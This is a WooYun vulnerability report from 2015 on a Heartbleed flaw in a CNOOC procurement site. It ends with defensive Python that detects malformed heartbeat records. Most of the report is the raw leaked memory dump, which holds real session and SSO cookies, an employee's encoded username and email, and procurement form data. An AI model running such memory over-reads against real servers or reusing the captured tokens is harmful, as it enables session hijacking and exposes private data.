
Defect ID: wooyun-2015-0124277

Title: Heartbleed on a CNOOC system site allows cookie capture

Affected vendor: China National Offshore Oil Corporation (CNOOC)

Author: 路人甲 ("Passerby A")

Submitted: 2015-07-04 22:49

Fix deadline: 2015-07-09 22:50

Public disclosure: 2015-07-09 22:50

Vulnerability type: system/service patch not applied in time

Severity: high

Self-assessed Rank: 15

Status: vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-07-04: details sent to the vendor, awaiting vendor action
2015-07-09: vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Heartbleed (the OpenSSL heartbeat memory-disclosure bug)

Detailed description:

http://sr.cnooc.com.cn/
is a procurement business system.

Proof of vulnerability (output of a Heartbleed test tool; the heartbeat response is memory returned by the server and contains a logged-in user's request headers and session cookies):

Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 66
... received message: type = 22, ver = 0302, length = 1309
... received message: type = 22, ver = 0302, length = 331
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
.@....SC[...r....+..H...9..w.3....f.....".!.9.8...5.....3.2.....E.D...../...A...I.....4.2...#.ooc.com.cn/zh/poll.jsp..Accept-Language: zh-cn..User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; InfoPath.2)..Content-Type: application/x-www-form-urlencoded..Accept-Encoding: gzip, deflate..Host: buy.cnooc.com.cn..Content-Length: 142..Connection: Keep-Alive..Cache-Control: no-cache..Cookie: wl_act2=n6fJVVqCZW8nWw0Qj5Yh8q20XvVPBhhpLXLfcMTRGncTPmQ2XT0R!-1697543082; emp_sso=dXNlck5hbWU9bGl5YW5nNCZidV9jb2RlPTI0ODAwLjE0MzU4ODkwNTE5ODgmZmlyc3ROYW1lPSVFNiU5RCU4RSVFNiVCNCU4QiZsYXN0TmFtZT0lRTYlOUQlOEUlRTYlQjQlOEImY29tcGFueU5hbWU9JUU0JUI4JUFEJUU1JTlCJUJEJUU2JUI1JUI3JUU2JUI0JThCJUU3JTlGJUIzJUU2JUIyJUI5JUU2JTgwJUJCJUU1JTg1JUFDJUU1JThGJUI4JmNhdGFsb2dOYW1lPWVtcHRvcmlzX2hpZXJhcmNoeSZncm91cE5hbWU9Q2xpZW50VXNlciZkYXRhYmFzZU5hbWU9Y25vb2NfZGVtbyZlbWFpbD1saXlhbmc0JTQwY25vb2MuY29tLmNuJnVzZXJMb2NhbGU9emhfQ04; emptoris_sso_session_id=784dbfd0c7da5b20f28d7a336832d7e7; ESP-SSO-logout=/sso/jsp/logout.jsp; ESP-SSO-timeout=/sso/jsp/login.jsp?jspAction=timeout; ep_srv=act1; ep_sid=LGZ.1141637516.54611; ep_slupd=act1; wl_act1=F1vQVVqJhxvY1cFMrsC791HYGVV7cvXtTT2Xmtd9LTR4HLQDZMQq!-1533068393....A.B..}i.K....[.j.:X8...../\Gn....R..K<.H./..=Ta..=I...QV)..q..3.Z..zXN5.d.a.o....9..+..y....;..,.57r....-..+....q|2M.d.E...q..L$.mG._...g7W..J..13...Z.m....:...7=D9.....g.{j@.E...z...7=D9.....g.{j@.E...z...UzB....?8..k....Z-..+f..R.....?8..k....Z-..+f..R...q.Y.]i.3{..F..d.&..v._MG..?J..!.....-#\+....n}..5.K.!7..~C"cB`.Ki.V.<...>..o.b.JI....r.X.1(..i.V.<...>..o.b.JI....r.X.1(..j.....z:[..3.=K....]...?..R....3./y.".hDX... 
..[...Y1..T.l.#.]}.....[n..;.....jlo8l@....O.Y...S...K...*.T.D._H))..Z5.....;c....7..V....K.d...W.....(x.|.7.E.H.TH.[.y.A4H.TH.[.y.A4specification=50%25&_uda__292892600932452=13020506&_uda__263812115326126324543489239033304463253421495=&_uda__263812115326126324542555136848=&_uda_minQuantity=20.000&_uda_unitOfMeasure=544915312&_uda__30003358312596837327=20.000&_uda__2013236135263992133320301=&_uda__300033583135745373272133320301=%E5%90%A8&_uda_dueDate=2015%2F10%2F31+12%3A00&dom_uda_dueDate_textDate=2015%2F10%2F31&dom_uda_dueDate_listHourMinute=12%3A00&_uda_udaDouble2=&_uda_historicalCost=17%2C500.00&_uda__292892600933521259912555136848=&_uda__29289260093352125991255513684832493=&_uda__36153299923186722411=&_uda__2403721378=&_uda__20132361352232028857=&_uda__26469283043199532479=544916572&_uda__20854201823582826126=&_uda__3865627714363193639421495=&_uda__300033583132773=&_uda_Available_Currencies=CNY%7CEUR%7CUSD%7C....%..S..:%95942_75950_23817964_1=&BP_1707092_231712_21695952_261503_23852184_1=&MA_1707092_231712_21695952_261503_23852184_1=&MA_1707092_195502_21695942_53160_23792945_1=&TREE_EXPANDED_IDS=1707092%2CL1707092I21695942%2CL1707092I21695952%2CL1707092I21695962%2CL1707092I21695972%2CL1707092I21695982&MA_1707092_124932_21695972_53160_23792965_1=0.000&MA_1707092_231712_21695952_115710_23795985_1=&IS_FRAME_FULLSCREEN=false&IS_FRAME_FULLSCREEN=false&BP_1707092_219802_21695982_53160_23792925_1=&BP_1707092_231712_21695952_53160_23792955_1=&MA_1707092_124932_21695972_75950_23817984_1=2.000&BP_1707092_124932_21695962_261503_23851644_1=&MA_1707092_231712_21695952_53160_23792955_1=&MA_1707092_124932_21695962_75950_23817954_1=2.000&BP_1707092_124932_21695962_53160_23792935_1=&MA_1707092_124932_21695972_261503_23851654_1=&MA_1707092_219802_21695982_261503_23851684_1=0.000&BP_1707092_231712_21695952_261503_23851574_1=&MA_1707092_219802_21695982_115710_23796715_1=&BP_1707092_219802_21695982_115710_23796715_1=&MA_1707092_231712_21695952_261503_23851574_1=&BP_1707092_195502_21
695942_53160_23792945_1=&BP_1707092_195502_21695942_115710_23797025_1=&BP_1707092_124932_21695972_115710_23796655_1=&BP_1707092_219802_21695982_261503_23851684_1=&MA_1707092_124932_21695962_115710_23797095_1=&MA_1707092_231712_21695952_75950_23817974_1=&SELECTED_SCENARIO=1500594&MA_1707092_219802_21695982_53160_23792925_1=&BP_1707092_124932_21695962_75950_23817954_1=&BP_1707092_124932_21695972_75950_23817984_1=&BP_1707092_195502_21695942_261503_23851564_1=G4...V...\....h.y..`..lPK...E-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_attachmentUrl[0]"-----------------------------7df3c5240592..Content-Disposition: form-data; name="attachment_complete[1]"....false..-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_name[1]"-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_AttachmentGroupCode[1]"....term.attachment.group.rfx.1..-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_locationType[1]"....1..-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_description[1]"-----------------------------7df3c5240592..Content-Disposition: form-data; name="FILE_UPLOAD[1]"; filename=""..Content-Type: application/octet-stream-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_attachmentUrl[1]"-----------------------------7df3c5240592..Content-Disposition: form-data; name="attachment_complete[2]"....false..-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_name[2]"-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_AttachmentGroupCode[2]"....term.attachment.group.rfx.1..-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_locationType[2]"....1..-----------------------------7df3c5240592..Content-Disposition: form-data; 
name="_uda_description[2]"-----------------------------7df3c5240592..Content-Disposition: form-data; name="FILE_UPLOAD[2]"; filename=""..Content-Type: application/octet-stream-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_attachmentUrl[2]"-----------------------------7df3c5240592..Content-Disposition: form-data; name="attachment_complete[3]"....false..-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_name[3]"-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_AttachmentGroupCode[3]"....term.attachment.group.rfx.1..-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_locationType[3]"....1..-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_description[3]"-----------------------------7df3c5240592..Content-Disposition: form-data; name="FILE_UPLOAD[3]"; filename=""..Content-Type: application/octet-stream-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_attachmentUrl[3]"-----------------------------7df3c5240592..Content-Disposition: form-data; name="attachment_complete[4]"....false..-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_name[4]"-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_AttachmentGroupCode[4]"....term.attachment.group.rfx.1..-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_locationType[4]"....1..-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_description[4]"-----------------------------7df3c5240592..Content-Disposition: form-data; name="FILE_UPLOAD[4]"; filename=""..Content-Type: application/octet-stream-----------------------------7df3c5240592..Content-Disposition: form-data; name="_uda_attachmentUrl[4]"-----------------------------7df3c5240592..Content-Disposition: form-data; 
name="upload.attachment.save"-----------------------------7df3c5240592--...M.z<.5.....Z.'5^j.FR. DG.....uV.....@8.s....O@...@."3W..lY...>$./.....r;./0..}.."h..SS.....qX|.d..W2....u!...x....F..M.f77.O....Y/$...]B6..g.#...&C...M[D.7U.!.a.dn..\l..h.a..u.../#P.I..6..F....6pX.M.:.Tg.....K...FR....d'...>.....f3..<n.e...0./..../....f?.....A..ZSG^....._.~...`..hY...G.P.[.a@-29...CS.:(..e..9...L....F..p..xV.hcxR ..w..).k..o.9...x.5y..r.VwB._t..4.F...D..I..].W_O.P..*._.....8....h..'(].U..i.X.i.."L...e.> ..F....>.....W..{.I'../#.e.....s..w..v..t.Nq<?....Y..eL.97*c..hZM..'.....T.A..&s7.e.U...s../c".Q .bDrs.f4.Gk.w.7.....[....(b...E.`.m...ML.'bib+.M.y...Q..,.ED>..P.-..Q..d...(.^..5...O. .#.a!.T..7..4.=.,.Ym.>.5O...S...[.i..6...[@..-.f.l.D.eF.Zm .^|.k[@.P....s-m....e.h}.....r.<...Y..+X..u...vU.].}....^..5....f._.w....Ci....X&~..U..Y...o.:-8....meF...1.(..)....f.?..dF...A.g....$.5FJ.p.8...h.Z.....NX...}..].._u..:'..X..l..C..!24{..9}...54.....85....)..H...z....C.[.<..W..;.m....z.y..9H.Fj..D*NE.2.....2.WR\$".4$k.V..L.D...$)J.N+...H...3k"d.R\L..Iu..,.rN./.d<B..M...$.d[(#..grP.m`.g6.L....a..=d.w.q..jHY..ZYf..<]....j.._.PK....!.....s.....word/footnotes.xml...N.0....x.*.]2..Tk'A.k...B...M.%ii..7.j...;.zI.1Y..... .z....mxK....y.Z.d/..$...6*.../\..&..e.P.-.....*n.k.f....MV....c+2b &.,8(|W.AQ.L;T...Jh.+R+*...Jj.Q.t.5.....8.U..[0.....ds.9.~jNN..z.t.q0.yx.....i..j.."..LA...A...[.....<&...h...5...c...f..n..Tc...[....v...M....i.sZ...2.^.....C...M..;e.;.....PK....!.#U1.t.....word/endnotes.xml...N.0.E.H.C.}...R.&. 8.E..l'....Y.UU!6.<.9..=.l?U.4.:.:!.ED..9.R.$p...U.EB...mz}.ic.s.^fK.ML...P.-b..vO.....9(..|....z.E+2b !.....+..($..g..Z..{EjE..@.R.7.._i.b9A.sM4.....CU...ln,p..F.!9...9...;.\q...1.t.x.....xt.Ez ...,.`..d..p..3..Y....E...n..N..LS.z._e...v...M7...j.u..S.8h/u....O..?[<)v...1.....PK....!...m.....Q.word/theme/theme1.xml.YMo.E..#..F{oc'v.Gu....h.F.[..x=..zvg53N..j.HH..z.Z.$..I)*E._.....N.&I.A..!..>....3.x.N..>.....U.W<Db..i.4.....5.I..!f<&MoJ.wi.....u... 
...:nz.R.....a...<!1..q.a.."X..|.|#..\...E....q.l..F.'....q.0..+..|&z.7qH.v8.j...6.h..O.(.1,..hz....6..t).p.ld.`...vk..[9..`j...t..j.V.".Zw...x.@..<.v.^9...V..Hu.L..~....*...e.o@._...Z.....7 ._..w/4Vk...BF...Z...M....g...5..UR.....g..1..Z.k...E1R.....i...@P...u..o../...,$}A...>L0..z....}rx...{....h.9T.8..T/.?.xY....'.~.....3S....~.....O_|w...)Ht...=..a.+..d NG..1-Rl...1.RJ.wT...M1K...."..o.h.e.PL.-.|%.E...hY.7.'qP.\L..=...d.q...3I.ofi..B....Rb.-J...P_p.G.....i.K.t.d..h.F..i...o.7;7Q..2...D.>a../...Q..>.X..W.....M._.u..H..q...).h+.:Vi.w.4r.B.q....."r...!..2l..a....C.b..U.|.....!.8^....8.>.,AV.t..~ls...14.._=,.....o..TV..G..".....bH.....'...4..x...w-.....E.|.F;...v..`.b3"G.'..e....\.fH..O...'.$..i_wp>.*..8....i&.LY..%\...,...x...=r6f....3.....T....)..:..Z..K...L.s..&C..M....0. .[...p@...`...j...7....Y.H.xH..i..cT5A.r...@...H....ZAZC.}.i'.RQ\m..,zo..,.gQ.u{..Y\,N/.=L._.Y.7C..6..-fS..h62.."..5.....N.H.T[X.65..4.X.%Y2.f.khi.~tCKF#..b..+.w.1m.|4`...!.:U..!.p5a:.~.{4.m..m.i..o....c..8m..D.J.pS..V..1.....?#S.i.?3E.'pS.2.....W`....q.B.](....08.....w.....n...A...[s..)k8..=. Aa?R. d.....c.U....d)#.Q.ueb...}..C!...&i.0....>..4...S.7...{....z....F.}..4..s.KvUKo....h.~1..jYU...V.H..5U8.Vk;.....L9.D... ...?*|FL.."..A3....>g.....]...d.m2iV.m.g<..r.8[kv.x....p..sj.,..z...][.jQv.1.1.i..u.....-...0%M2.oJ....3u..o%.....PK....!...f.%.....word/settings.xml.W[s.8.~.1W..8.....v;%.}.A6l.b$a...{...S...S..|:7.}.}.....pQ.vcX7.. m...=l./..20.B.....dc..0).DJ0...hE.6F..P..i.X6u..`{.,X...<.jr.a.i.m.x...a...=.m.hU.....]4...A.?K.....d.?...=1^~.....C.YA...6tL..u;...+8c=.....+c...v..PP..i.+....0.[.myO0.^Ug..I.a.}..$..:B.0B.%..?.....C.G..Y.=..|..\s.).u.....0.;\.h6.<4.^....|.x.7..>..3.h?..fm..E.9. 
...0....}..B..d.~U...wd;.).nY(.`J\,.!y;.....P.s...W..G.S....P.O\.m..p.rc,.....!q..../i.Z:.\9..`.b....1..a..Lq[..ZFI|.d...x...e5N$....XT.Z6C.GA.....VR^.{..HX;.-....|.[rO.C%..0Yt..$K.....l....a....S.....s_M3.,..FLi/...Sw.....r.3....E1r...K.i..},B..gZ...H.c.n..:....X...:I.....o...qb.e.....2m....n.C....v...t...,+.b.....V..2.dE:.d.(.~q..C..{...s.T[...6.F..7p..l.m3.$(.j....D...C[}.....vB..^#.=.....:.e....-..(.k\{mk'>va..Z.5...v..`....r.L{O.9....I...Nb.....:...h...~.jc.!xe#..,.m.i...v.^.8.6.NU...?d.{\..`{7..q.Q.O.<..f$..nv..o.....v....N..&.w.rf@.f.p.Q0.....<....V.$..74..QO.w.;.....^.f..~..^-...T}[.}..pu).).@.....|.R.]~..S#X.H.xc|...G...%..b.....cw.'.=..K...\.d.z:(...V.."sf.s.Y.]dh.!%...y..>....J.g...).g...A4.a.n.M.&..4.H...S.PQ..J.(..&..fu.<..5.i~nv.nz3FNk!s.....C....k...?rw..PK....!..9T.....>.word/webSettings.xml.WK..0..W..@.w1...BVJW....v...N.d{.$i.....Us...y1..O.,..k...u.LI.+J.a*sSs.F.d/..^.~....X0.qs[...v...j....ZaP.....J.@....aLi.Z....\#[G..[..p.....Osi..s.....XN.,J..n..*I.[kn....6...C..v....M...j.....1XY....$X.....Z....`]...C..,.q..'.....7.... ./~.I.$Q.'Q:`2U.../Q.....a=.p..(...S$fQL..(&..!.K.t.G.f,O).&8.K'v.j[....,bY..cb.%.#+h.h.L...vD.,fq..l..%.#.E.....p?.@..B....?.G.....w..+..gS....PK....!..p]Oword/styles.xml.\Ko. ...<..m.x.....j...9s8=..8...X.... .$.c..d.....z|UMu../.?.'..g..#B/..n8w.(....Hz_....>H.. L....2M.....o)Vn.Y..!|... Z,|O.G.f%..`....b..).'K....l.....x..#O$..v...V...^....w...&H..1...G...\Da.8I.._&Z.a...n..$.;...?m..0...K.I.$R...0...Lz"|.v.=.....+.4..0..?...`...<.Y..:...U.-..$<U..Y..e....4./&=.26.}}..Qg.q*V.+.>.. ..E.6T....6a: ..|...T/..@N..ppA..X.j..b..2....Hv..R....\.-..z..h(wT....Z)..;j?_..6.VIRj.y...61zVc.r.aE.#..i.a.H...$.G...8.Px..C..#.u...\$.....O.!...OK..!..vc.6v.KGr...?.J!.T.....W.k..~x..4M.(.}l..\..n.'..s.....&...HG.8fe..E.....f.8h...9...A.m\.F..c....L...Cz#...Q..../..eP..c.V.&'.p...../....2..C...Et(Udj.."T8.o..'._./..R....P....h...e3....9$.:f..Y.D.b.d>.H..l..!h[`;q>?.$....E.b.l].<.@a.CVJ.Y.;b+..5d`..Z...t..w.|y6...#.. 
...i_o"...r...yT..!<.I.CC.Y<..V...cj.2...B...>.9O... ..#..M.y.C.&3.1..s ^..(n../...m...I@ak..:...,K.M..f.('o...!o.P7.M.....@.....;.&`..!..2y....v..QFB8Km.. ...{ak.F..,..*X9....!o.P7.M.....@..7....&..'.f...S..M.b.C.T&o..v.D....^...M@a+.$o..[;.B..T..[A.....X..c.n....n.....y...!o.P{.n.....Xln.9.L.. 6=.@e.&...a'y.3>:y.P..2.....N.Ps.#`..T.....@.e_ ...!o...!o.P7.M.jO.. ..7....9....L.. 67.$o..G'o..[A&y.P....jN..,..*X9....!o...fk.&.a.=...8j....;....@.....;.&`..!..2y.y.....o..,F@.g..j ..-J..C..h....0.!..b..-.F..C.9>.~N..at\s3...3..*.1..Im.....r9.....1Xg.w.'.uvw]...J.fK..a..Pp.bE.,!.>XE....O.....R.y..c..<.?.[.q...U.o..a..K.L....,f.%....C../.'..dU..t....`>.S...}..}..M.....Y_.Kr..B...-@7...Y..l...gQ..}..T.2}yqtz...kL\R....|3.....!t...".P(..d.~.&.E..w.j0D.W..Nb_U..:.....S..h....F....Bc.V.i..46.D5.....|eE.W=U...U....FV....^:.}.:B..XG%lk...4.z@.u..7.e)zB.1.,....T... .M.Z.3....n.&I...`...g5..'....o....,P..~y..H.....*...k....D.|..2.....5...-`.A.O .. ....>>..... ..b.Gj&b][dK.L...$.....}][..m...T.YW...`...)....8.QT.&..+.k.v....O98...S..Ta..g...'L..MT..E..JTE*.DG<....KI.^.-b...$..]3uP.5$..7+.mH..2`...,.8...r..x..p...&._..`...Y..o.$-.8.W[(....Y.?.T.M2N5}.....MTp.L..)..".u.6R.8.....Sif[U.)9...R.Z.;x...mP'{.X.>.c..'0x"..4*mX:S..=YR.O.6i$W..@6.$cp..S.q....pp#..].....].D.xPO....w.zT...{.?...C.....,.~..o.....>.)..#.*..F1.v.nW..D...7XDPN.)....`...2;+...e..h.y./l.y.([...<S4..|..I...0...r..bd.Q. `...X....
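The tool output above shows a 16384-byte heartbeat response coming back for a small request, which is the signature of the over-read. As an added example that is not part of the original report, the following Python applies the two record-level checks a defender's IDS uses to spot that pattern in captured TLS traffic: a heartbeat request that declares more payload than it carries, and a heartbeat response that returns more data than the preceding request actually sent. The record layout follows RFC 6520; the sample records, the `make_heartbeat` helper and all function names are constructed for this example.

```python
"""Heartbeat-record sanity checks of the kind an IDS applies to TLS traffic.

Added example (not from the WooYun report): parses raw TLS records, then flags
a heartbeat request that claims more payload than it carries and a heartbeat
response that returns more data than the request actually sent.  All sample
records below are constructed inline.
"""
import struct

TLS_HEARTBEAT = 24            # TLS content type for heartbeat (RFC 6520)
HB_REQUEST, HB_RESPONSE = 1, 2
TLS_1_1 = 0x0302              # the "ver = 0302" seen in the report's tool output


def parse_records(data):
    """Split a raw TLS byte stream into (content_type, version, body) tuples.

    A trailing record whose length field exceeds the bytes available is
    dropped as truncated rather than parsed.
    """
    records, pos = [], 0
    while pos + 5 <= len(data):
        ctype, version, length = struct.unpack("!BHH", data[pos:pos + 5])
        body = data[pos + 5:pos + 5 + length]
        if len(body) < length:
            break
        records.append((ctype, version, body))
        pos += 5 + length
    return records


def heartbeat_findings(data):
    """Return human-readable findings for suspicious heartbeat messages.

    Two checks, both from the defender's side:
      * request: declared payload_length larger than the bytes actually
        present (the message that triggers the over-read);
      * response: declared payload_length larger than what the preceding
        request actually carried (the over-read succeeded and data leaked).
    """
    findings = []
    request_bytes_sent = None
    for ctype, _version, body in parse_records(data):
        if ctype != TLS_HEARTBEAT or len(body) < 3:
            continue
        hb_type, declared = struct.unpack("!BH", body[:3])
        present = len(body) - 3          # payload + padding actually on the wire
        if hb_type == HB_REQUEST:
            request_bytes_sent = present
            if declared > present:
                findings.append(
                    f"malformed heartbeat request: declares {declared} payload "
                    f"bytes but carries {present}")
        elif hb_type == HB_RESPONSE:
            if request_bytes_sent is not None and declared > request_bytes_sent:
                findings.append(
                    f"heartbeat response returned {declared} bytes for a request "
                    f"that sent {request_bytes_sent}: memory disclosure")
    return findings


def make_heartbeat(hb_type, payload, declared=None, padding=b"\x00" * 16):
    """Build one TLS heartbeat record (constructed sample data, RFC 6520 layout)."""
    if declared is None:
        declared = len(payload)
    body = struct.pack("!BH", hb_type, declared) + payload + padding
    return struct.pack("!BHH", TLS_HEARTBEAT, TLS_1_1, len(body)) + body


# Constructed sample traffic: a well-formed exchange, and a response far larger
# than the tiny request, like the 16384-byte response in the report's dump.
BENIGN = (make_heartbeat(HB_REQUEST, b"ping")
          + make_heartbeat(HB_RESPONSE, b"ping"))
LEAKED = (make_heartbeat(HB_REQUEST, b"ping")
          + make_heartbeat(HB_RESPONSE, b"A" * 16384, padding=b""))

if __name__ == "__main__":
    print("benign:", heartbeat_findings(BENIGN))
    print("leaked:", heartbeat_findings(LEAKED))
```

The response-side check is what makes the detector useful after the fact: even if the request was not captured in full, a heartbeat response whose declared length dwarfs anything a legitimate client sends is the leak itself, and the cookies and headers in the dump above are exactly what such a record carries. The real fix is the one the report gives below: patch OpenSSL, then rotate every session cookie and credential that could have been in the process memory.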

Fix:

Patch it!

Copyright notice: when reproducing, please credit the source: 路人甲@乌云 (WooYun)


Vendor response

Vendor response:

Severity: no impact, vendor ignored

Ignored at: 2015-07-09 22:50

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None yet